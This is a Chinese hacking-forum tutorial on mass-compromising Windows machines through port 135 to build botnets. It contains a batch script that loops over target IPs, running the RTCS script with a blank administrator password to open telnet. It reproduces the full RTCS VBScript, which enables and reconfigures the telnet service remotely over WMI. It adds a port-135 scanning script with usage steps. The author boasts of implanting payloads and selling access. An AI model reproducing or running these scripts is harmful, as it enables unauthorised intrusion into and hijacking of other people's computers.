關(guān)于135抓肉雞的分析最近好象135搞的很火熱 看見有人也把那個批量抓135肉雞的工具發(fā)出來了我也就說下把 反正俺也不早就不用那鳥東西了 上次看了那個也說一天抓1000只肉雞 由于我是開快進看的 沒仔細的看 我以為他是自動登陸telnet 所以我就暈死了 應(yīng)為自動登陸telnet我以前研究很多 我由于我批處理我學的不怎么樣也就會點皮毛就加了他 結(jié)果他一上來就開口批量開23賣2000RMB 人品啊 我倒 那鳥東西不清楚大家知道作者不 那是02年安全焦點的大哥寫的 我有RT整個全套代碼的 一萬年前我就知道怎么批量開23了 不廢話了先說其他的把 后來一位大哥把他的RT整套腳本整合寫了一個RCMD1。05這個是目前的最新版好象 需要解決的問題我詳細的說一下把 首先要解決的就是批量開23了 rtcs腳本（百度一下有下的找不到就是搜索水品問題了） 里面的代碼如果懂VBS的朋友去看下 就是先用VBS遠程連接主機的wmi服務(wù) 然后剩下的是開啟和過認證部分 以前有一篇文章分析過說是作者寫的有一個小BUG 就是如果原來已經(jīng)開啟的話可以直接轉(zhuǎn)到退出的 這里不多說這個了 for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit 這個是我以前寫的一個批處理 有興趣的朋友可以看下 其實很簡單 外面流傳的需要過濾23 我的不需要過濾23 有興趣的朋友可以看下 代碼正確性沒測試應(yīng)為我寫過好幾個版本現(xiàn)在已經(jīng)不記得哪個是可以用的了 但是思路很明顯的相信大家可以看明白 要解決的問題二 我也嘗試了用腳本來實現(xiàn)先telnet ip 然后sendkey 后來發(fā)現(xiàn)問題大大的 只能一個一個種植不能實現(xiàn)批量種植 后來朋友給冰冰批量 就是現(xiàn)在大家可以在外面找的版本 他很好的解決了批量登陸和自動種植的問題 調(diào)用輔助工具 設(shè)置登陸腳本然后自動種植 但是我相信用的朋友一定知道有什么問題 telnet認證是很復雜的 此外容易出現(xiàn)提示丟失腳本的錯誤 其他的不知道說什么了 我今天上網(wǎng)給朋友搞東西 弄的累的要死 思路不是很清楚 我在總結(jié)下把 首先寫一個S掃描的BAT然后里面用FOR循環(huán)自動整理IP 然后NT過濾 然后調(diào)用上面我發(fā)的批處理批量開23 然后寫一個批處理直接調(diào)用輔助工具自動登陸自動種植 效果如何 大家詳細的去看動畫就知道了 而后來我寫的一個版本 就很帥了 嘿嘿 保密中 應(yīng)為工具是給兄弟群共享的 他們有業(yè)務(wù)來著 如果我把東西發(fā)布了說是會干掉我 怕怕 給會懂VBS的朋友說一下把 引導一下思路 前面的掃描和和NT過濾還是一樣的不說了 遠程連接wmi大家可以看rtcs的腳本 關(guān)鍵地方就是下面了 難道遠程連接到了wmi服務(wù)就只有開telnet一條出路嗎 貌似wmi功能多多把 具體能干什么去看安焦點rtcs作者02年的文章把 目前我寫的腳本和所有的工具打包起來也才70多K 同時開4個服務(wù)器一天抓1萬只肉雞 信不信由你 相信大家都知道recton里有一個http種植者的功能把 去找找文章看人家怎么實現(xiàn)的 最近風聲很緊有業(yè)務(wù)的朋友最好小心 最近的通道不是那么安全 這個是rtcs的代碼 自己保存成VBS on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number) wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function 經(jīng)典吧，呵呵，我覺得，呵呵，管理員要給我加錢啊，呵呵
關(guān)于for循環(huán) 我解釋下 for /f這個這個參數(shù)表示對文本操作 tokens表示截取 tokens=1,2表示選取1，2兩個部分 eol表示忽略 eol=-表示忽略-開始的行 delims表示分割符 delims=,表示對每行以“，”為分割符號對行進行分割字符 那么我給大家寫一個S掃描自動整理IP的批處理把 s.bat setlocal
cls
color A
title 自動抓雞v1.0
echo ======================================================
echo 自動抓雞v1.0
echo 作者：hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt 掃描那行的FOR循環(huán) for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是說 從ip.txt中對每行以空格分割 然后取得分割后的第一部分和第二部分字符 第一個%%i是形參 代替你要取出來的部分 那么后面的2個部分的%%i 和%%j表示取出的兩個部分按順序代替的參數(shù)了 后面的幾行都是掃描完成的result過濾整理 先忽略以空格 - P S開頭的行 然后用echo寫入文本來轉(zhuǎn)的 用法 大家把上面的批處理代碼保存成 s.bat然后在同一目錄建立一個ip.txt的文本 然后把下面的這些復制進IP。TXT里面 （不需要整理 直接全放進去 漢字不需要去掉） 掃描和整理結(jié)束以后會有一個S。TXT文本 自己打開看看效果把 ^_^ 忘了說了把s.exe ip.txt和s.bat放在同一目錄 好了我閃了.

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。